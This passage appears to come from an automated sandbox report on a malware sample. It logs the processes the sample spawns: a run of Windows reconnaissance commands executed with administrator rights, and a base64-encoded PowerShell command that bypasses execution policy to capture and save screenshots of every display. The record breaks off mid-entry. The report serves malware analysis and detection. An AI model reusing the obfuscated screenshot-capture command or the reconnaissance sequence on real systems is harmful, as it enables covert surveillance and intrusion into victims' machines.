                                                                                                                                                                                                                                  Target ID:56
                                                                                                                                                                                                                                  Start time:03:20:18
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\query.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:query user
                                                                                                                                                                                                                                  Imagebase:0x7ff750bf0000
                                                                                                                                                                                                                                  File size:17'408 bytes
                                                                                                                                                                                                                                  MD5 hash:29043BC0B0F99EAFF36CAD35CBEE8D45
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:57
                                                                                                                                                                                                                                  Start time:03:20:18
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\quser.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\quser.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff611410000
                                                                                                                                                                                                                                  File size:25'600 bytes
                                                                                                                                                                                                                                  MD5 hash:480868AEBA9C04CA04D641D5ED29937B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:58
                                                                                                                                                                                                                                  Start time:03:20:18
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:net localgroup
                                                                                                                                                                                                                                  Imagebase:0x7ff6c8ac0000
                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:59
                                                                                                                                                                                                                                  Start time:03:20:18
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 localgroup
                                                                                                                                                                                                                                  Imagebase:0x7ff6cb310000
                                                                                                                                                                                                                                  File size:183'808 bytes
                                                                                                                                                                                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:60
                                                                                                                                                                                                                                  Start time:03:20:19
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:net localgroup administrators
                                                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:61
                                                                                                                                                                                                                                  Start time:03:20:19
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 localgroup administrators
                                                                                                                                                                                                                                  Imagebase:0x7ff6cb310000
                                                                                                                                                                                                                                  File size:183'808 bytes
                                                                                                                                                                                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:62
                                                                                                                                                                                                                                  Start time:03:20:19
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:net user guest
                                                                                                                                                                                                                                  Imagebase:0x7ff6c8ac0000
                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:63
                                                                                                                                                                                                                                  Start time:03:20:19
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 user guest
                                                                                                                                                                                                                                  Imagebase:0x7ff6cb310000
                                                                                                                                                                                                                                  File size:183'808 bytes
                                                                                                                                                                                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:64
                                                                                                                                                                                                                                  Start time:03:20:19
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:net user administrator
                                                                                                                                                                                                                                  Imagebase:0xd90000
                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:65
                                                                                                                                                                                                                                  Start time:03:20:19
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 user administrator
                                                                                                                                                                                                                                  Imagebase:0x7ff6cb310000
                                                                                                                                                                                                                                  File size:183'808 bytes
                                                                                                                                                                                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:66
                                                                                                                                                                                                                                  Start time:03:20:19
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic startup get caption,command
                                                                                                                                                                                                                                  Imagebase:0x7ff73e070000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:67
                                                                                                                                                                                                                                  Start time:03:20:20
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:tasklist /svc
                                                                                                                                                                                                                                  Imagebase:0x7ff792ef0000
                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:68
                                                                                                                                                                                                                                  Start time:03:20:21
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                                                  Imagebase:0x7ff632460000
                                                                                                                                                                                                                                  File size:35'840 bytes
                                                                                                                                                                                                                                  MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:69
                                                                                                                                                                                                                                  Start time:03:20:21
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\ROUTE.EXE
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:route print
                                                                                                                                                                                                                                  Imagebase:0x7ff63b5f0000
                                                                                                                                                                                                                                  File size:24'576 bytes
                                                                                                                                                                                                                                  MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:70
                                                                                                                                                                                                                                  Start time:03:20:21
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\ARP.EXE
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:arp -a
                                                                                                                                                                                                                                  Imagebase:0x7ff67ae40000
                                                                                                                                                                                                                                  File size:26'624 bytes
                                                                                                                                                                                                                                  MD5 hash:2AF1B2C042B83437A4BE82B19749FA98
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:71
                                                                                                                                                                                                                                  Start time:03:20:21
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\NETSTAT.EXE
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:netstat -ano
                                                                                                                                                                                                                                  Imagebase:0x7ff790100000
                                                                                                                                                                                                                                  File size:39'936 bytes
                                                                                                                                                                                                                                  MD5 hash:7FDDD6681EA81CE26E64452336F479E6
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:72
                                                                                                                                                                                                                                  Start time:03:20:21
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:sc query type= service state= all
                                                                                                                                                                                                                                  Imagebase:0x7ff706650000
                                                                                                                                                                                                                                  File size:72'192 bytes
                                                                                                                                                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:73
                                                                                                                                                                                                                                  Start time:03:20:21
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:netsh firewall show state
                                                                                                                                                                                                                                  Imagebase:0x7ff6d3e40000
                                                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:74
                                                                                                                                                                                                                                  Start time:03:20:21
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:netsh firewall show config
                                                                                                                                                                                                                                  Imagebase:0x7ff6d3e40000
                                                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:75
                                                                                                                                                                                                                                  Start time:03:20:22
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:76
                                                                                                                                                                                                                                  Start time:03:20:22
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:77
                                                                                                                                                                                                                                  Start time:03:20:22
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                  Imagebase:0x7ff73e070000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:79
                                                                                                                                                                                                                                  Start time:03:20:23
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:80
                                                                                                                                                                                                                                  Start time:03:20:23
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:81
                                                                                                                                                                                                                                  Start time:03:20:23
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
